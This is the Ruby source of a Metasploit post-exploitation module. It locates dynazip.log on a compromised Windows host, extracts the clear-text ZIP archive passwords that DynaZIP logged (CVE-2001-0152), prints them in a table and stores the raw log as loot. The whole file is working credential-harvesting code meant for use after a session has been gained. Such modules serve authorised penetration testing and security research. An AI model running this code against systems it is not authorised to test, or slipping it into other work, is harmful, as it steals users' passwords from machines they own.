GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/dynazip_log.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
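class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Auxiliary::Report

  # Every diagnostic entry written by DynaZIP starts with this banner; the
  # log is split on it so that each archive is processed independently.
  LOG_ENTRY_SEPARATOR = '- DynaZIP ZIP Diagnostic Log -'.freeze

  # The line after the lpszZIPFile pointer holds the archive path.
  # '^' is intentional here: the log is multi-line text and the regex is
  # meant to match at line starts, not at the start of the whole string.
  ZIP_PATH_REGEX = /^lpszZIPFile: 0x[0-9a-f]+\s*?^(.+)\r\n/

  # The line after the lpszEncryptCode pointer holds the clear-text password.
  # The pointer value appears to always be 0x712185d4, but a generic hex
  # pattern is used just in case.
  PASSWORD_REGEX = /^lpszEncryptCode: 0x[0-9a-f]+\s*?^(.+)?\r\n/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather DynaZIP Saved Password Extraction',
        'Description' => %q{
          This module extracts clear text credentials from dynazip.log.
          The log file contains passwords used to encrypt compressed zip
          files in Microsoft Plus! 98 and Windows Me.
        },
        'License' => MSF_LICENSE,
        'Author' => ['bcoles'],
        'References' => [
          ['CVE', '2001-0152'],
          ['MSB', 'MS01-019'],
          ['PACKETSTORM', '24543'],
          ['URL', 'https://support.microsoft.com/en-us/kb/265131']
        ],
        'DisclosureDate' => '2001-03-27',
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter', 'shell'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Locates %WINDIR%\dynazip.log on the target, parses every diagnostic entry
  # for an archive path / password pair, prints the results as a table and
  # saves the raw log as loot so the evidence outlives the session.
  #
  # @return [void]
  def run
    # get_env returns nil when the variable cannot be resolved; without this
    # guard the module would go looking for "\dynazip.log" and report a
    # misleading "not found" error.
    windir = get_env('%WINDIR%')
    if windir.to_s.empty?
      print_error('Could not determine %WINDIR% on the target')
      return
    end

    log_path = "#{windir}\\dynazip.log"

    unless file?(log_path)
      print_error("#{log_path} not found")
      return
    end

    print_good("Found DynaZip log file: #{log_path}")

    begin
      log_data = read_file(log_path)
    rescue EOFError
      print_error('Log file is empty')
      return
    end

    # read_file may hand back nil on some session types when the read fails;
    # treat that like an empty log instead of raising NoMethodError on .length.
    if log_data.to_s.empty?
      print_error('Log file is empty')
      return
    end

    vprint_status("Processing log file (#{log_data.length} bytes)")

    creds = extract_credentials(log_data)

    if creds.empty?
      print_error('No passwords were found in the log file')
      return
    end

    # Msf::Auxiliary::Report is included for exactly this: keep the raw log
    # as loot rather than only echoing the passwords to the console.
    loot_path = store_loot(
      'host.windows.dynazip.log',
      'text/plain',
      session,
      log_data,
      'dynazip.log',
      'DynaZIP diagnostic log'
    )
    print_good("DynaZIP log saved to #{loot_path}")

    table = Rex::Text::Table.new(
      'Header' => 'ZIP Passwords',
      'Indent' => 0,
      'SortIndex' => 0,
      'Columns' => ['File Path', 'Password']
    )
    creds.each { |c| table << c }
    print_line
    print_line(table.to_s)
  end

  # Parses the raw dynazip.log text into archive path / password pairs.
  #
  # Entries without a recognisable lpszZIPFile line are skipped. Entries whose
  # password line is blank are skipped as well: a blank password means the
  # archive was not encrypted, but DynaZIP still writes the empty line.
  #
  # @param log_data [String] full contents of dynazip.log
  # @return [Array<Array(String, String)>] [zip_path, password] pairs, in log order
  def extract_credentials(log_data)
    creds = []

    log_data.split(LOG_ENTRY_SEPARATOR).each do |entry|
      path_match = entry.match(ZIP_PATH_REGEX)
      next unless path_match

      zip_path = path_match[1]
      vprint_status("Processing log entry for #{zip_path}")

      # Only the first lpszEncryptCode line of an entry is considered.
      passwd = entry.scan(PASSWORD_REGEX).flatten.first

      if passwd.to_s.empty?
        vprint_status('Did not find a password')
        next
      end

      print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
      creds << [zip_path, passwd]
    end

    creds
  end
end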